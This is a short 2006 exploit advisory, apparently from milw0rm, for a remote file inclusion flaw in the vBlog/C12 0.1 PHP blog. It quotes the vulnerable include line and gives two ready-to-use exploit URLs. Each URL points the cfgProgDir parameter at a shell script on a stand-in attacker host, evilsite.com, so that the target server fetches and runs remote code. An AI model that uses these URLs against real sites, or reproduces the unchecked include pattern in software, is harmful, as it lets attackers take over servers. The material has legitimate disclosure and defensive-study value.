vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities

2006-11-08T00:00:00
ID SECURITYVULNS:DOC:14966
Type securityvulns
Reporter Securityvulns
Modified 2006-11-08T00:00:00

Description


                                          WwW.Deltahacking.NeT (Priv8  Site)
                                          WwW.Deltahacking.Ir    (Public Site)

  • Portal Name :Vortex Blog AKA vBlog

  • Class = Remote File Inclusion ;

  • Download =http://switch.dl.sourceforge.net/sourceforge/c12/C12_a0.1_nonfunc.zip

  • Found by = Dr.Pantagon (rezayavari2006@yahoo.com)



  • Vulnerable Code

    include($cfgProgDir . "session.php");

++++++++++++++++++++++++++++++++++++++++++++

  • Exploit:

    http://[target]/[path]/admin/auth/secure.php?cfgProgDir=http://evilsite.com/shell? http://[target]/[path]/admin/auth/checklogin.php?cfgProgDir=http://evilsite.com/shell?



Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord Special Thanks To Best My Friend : Tanha


milw0rm.com [2006-11-08]